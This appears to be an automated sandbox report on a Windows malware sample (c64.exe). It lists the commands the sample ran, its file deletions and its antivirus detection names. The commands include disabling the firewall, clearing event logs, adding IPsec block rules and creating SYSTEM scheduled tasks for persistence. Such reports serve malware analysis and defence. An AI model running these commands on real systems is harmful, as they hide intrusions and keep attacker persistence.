cmdline	sc delete mssecsvc2.1
cmdline	sc delete mssecsvc2.0
cmdline	schtasks /delete /tn "Adobe Flash Player Updaters" /f
cmdline	sc delete SSDPSRVS
cmdline	schtasks /delete /tn AutoKMSK /f
cmdline	netsh ipsec static del all
cmdline	schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART
cmdline	ipconfig /flushdns
cmdline	netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
cmdline	net stop Bcdefg
cmdline	netsh ipsec static add filteraction name=deny action=block
cmdline	attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts
cmdline	schtasks /run /tn "AutoKMSK"
cmdline	netsh firewall set opmode mode=disable
cmdline	sc start Schedule
cmdline	sc delete Bcdefg
cmdline	net stop WSSDPSRVS
cmdline	schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f
cmdline	sc config PolicyAgent start= AUTO
cmdline	sc delete COMSysCts
cmdline	netsh ipsec static add filterlist name=Allowlist
cmdline	net stop WmiAppSrv
cmdline	netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
cmdline	netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
cmdline	sc delete WmiAppSrv
cmdline	netsh ipsec static add filteraction name=Allow action=permit
cmdline	sc start PolicyAgent
cmdline	net stop COMSysCts
cmdline	netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
cmdline	netsh ipsec static add filterlist name=denylist
cmdline	netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
cmdline	netsh ipsec static set policy name=Aliyun assign=y
cmdline	sc config lanmanserver start= DISABLED 2>nul
cmdline	netsh ipsec static add policy name=Aliyun

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Sept. 2, 2024, 10:12 a.m.	service_handle: 0x00784d38 service_name: Browser control_code: 1	1	1	0
ControlService Sept. 2, 2024, 10:12 a.m.	service_handle: 0x0078d7a8 service_name: LanmanServer control_code: 1	1	1	0

Installs itself for autorun at Windows startup (2 events)

cmdline	schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART
cmdline	schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 230 events)

file	C:\Users\test22\AppData\Local\Temp\c64.exe
file	C:\Users\test22\AppData\Local\Temp\tem.vbs
file	c:\Windows\inf\demo1.bat
file	C:\Windows\System32\drivers\etc\hosts
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file	C:\Users\test22\AppData\Local\Temp\java_install_reg.log
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\5BY0Y7HX\index-vfl0GyzuL[1].css
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\ajax-loading-small-vfl3Wt7C_[1].gif
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504233731A78).log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000011.log
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\favicon[3].png
file	C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 KOR Language Pack Setup_20200715_141443571.html
file	C:\Users\test22\AppData\Local\Temp\dd_dotNetFx45LP_Full_x86_x64ko_decompression_log.txt
file	C:\Users\test22\AppData\Local\Temp\dd_SetupUtility.txt
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AdPostInjectAsync[1].nhn
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000001.log
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\favicon[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\TopNav[1].js
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00000.log
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\RxZJdnzeo3R5zSexge8UUfY6323mHUZFJMgTvxaG2iE[1].eot
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000016.log
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\keys_js5[2].htm
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\CURBIYE7\yahoo[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\desktop.ini
file	C:\Users\test22\AppData\Local\Temp\tmpaddon-1
file	C:\Users\test22\AppData\Local\Temp\~DFB8537D6963ECB123.TMP
file	C:\Users\test22\AppData\Local\Temp\MSIdfbe6.LOG
file	C:\Users\test22\AppData\Local\Temp\FXSAPIDebugLogFile.txt
file	C:\Users\test22\AppData\Local\Temp\{E7573238-1B24-467B-B5A4-0BE967E0BF64}.tmp
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\favicon[4].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\keys_js5[2].htm
file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\favicon[2].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\ipsec[1].htm
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\gmail[1].jpg
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\mnrstrtr[1].js
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152043A34).log
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548.log
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C).log
file	C:\Users\test22\AppData\Local\Temp\RGI1518.tmp-tmp
file	C:\Users\test22\AppData\Local\Temp\DMI9EEF.tmp
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f[2].txt
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\CURBIYE7\klldr[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\favicon[1].png
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat

Uses suspicious command line tools or Windows utilities (5 events)

cmdline	wevtutil cl "system"
cmdline	wevtutil cl "security"
cmdline	cacls C:\Windows\system32\Drivers\etc\hosts /g users:f
cmdline	wevtutil cl "windows powershell"
cmdline	cacls C:\Windows\system32\Drivers\etc\hosts /d everyone

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks.exe /create /TN "AutoKMSK" /RU SYSTEM /TR "C:\windows\Installer\Fileftps.exe" /SC ONSTART
cmdline	schtasks /create /sc minute /mo 15 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f

Generates some ICMP traffic

File has been identified by 58 AntiVirus engines on VirusTotal as malicious (50 out of 58 events)

Bkav	W32.VrerTmpolT.Trojan
Lionic	Trojan.Win32.Generic.lpDo
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
Skyhigh	BehavesLike.Win32.Generic.rc
ALYac	Gen:Variant.Application.Graftor.485457
Cylance	Unsafe
VIPRE	Gen:Variant.Application.Graftor.485457
Sangfor	Dropper.Win32.FlyStudio.Vovj
K7AntiVirus	Trojan ( 005246d51 )
BitDefender	Gen:Variant.Application.Graftor.485457
K7GW	Trojan ( 005246d51 )
Cybereason	malicious.879361
Arcabit	Trojan.Application.Graftor.D76851
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
ESET-NOD32	a variant of Win32/TrojanDropper.FlyStudio.CO
APEX	Malicious
McAfee	Artemis!D94524A87936
Avast	Win32:Malware-gen
ClamAV	Win.Malware.Temr-7070541-0
Kaspersky	Trojan.Win32.Eb.dlp
Alibaba	TrojanDropper:Win64/Miancha.fd64af8c
NANO-Antivirus	Trojan.Win32.Eb.jsmbnw
MicroWorld-eScan	Gen:Variant.Application.Graftor.485457
Emsisoft	Gen:Variant.Application.Graftor.485457 (B)
F-Secure	Trojan.TR/AD.EquationDrug.qhhxk
Zillya	Dropper.FlyStudio.Win32.2
McAfeeD	Real Protect-LS!D94524A87936
Trapmine	malicious.moderate.ml.score
FireEye	Generic.mg.d94524a8793610d5
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
Webroot	W32.Adware.Gen
Google	Detected
Avira	TR/AD.EquationDrug.qhhxk
MAX	malware (ai score=71)
Kingsoft	malware.kb.a.929
Xcitium	Worm.Win32.Dropper.RA@1qraug
Microsoft	Trojan:Win32/DoublePulsar
ViRobot	Trojan.Win.Z.Flystudio.4698112
ZoneAlarm	Trojan.Win32.Eb.dlp
GData	Win32.Trojan.PSE.17CZDTL
Varist	W32/S-480dd005!Eldorado
AhnLab-V3	Trojan/Win.Eqtonex.C5213267
BitDefenderTheta	Gen:NN.ZexaF.36812.@t0@aqMGwNcb
DeepInstinct	MALICIOUS
VBA32	Trojan.Win64.Miner
Malwarebytes	Generic.Trojan.Malicious.DDS
Ikarus	Trojan.Win32.Agent

c64.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All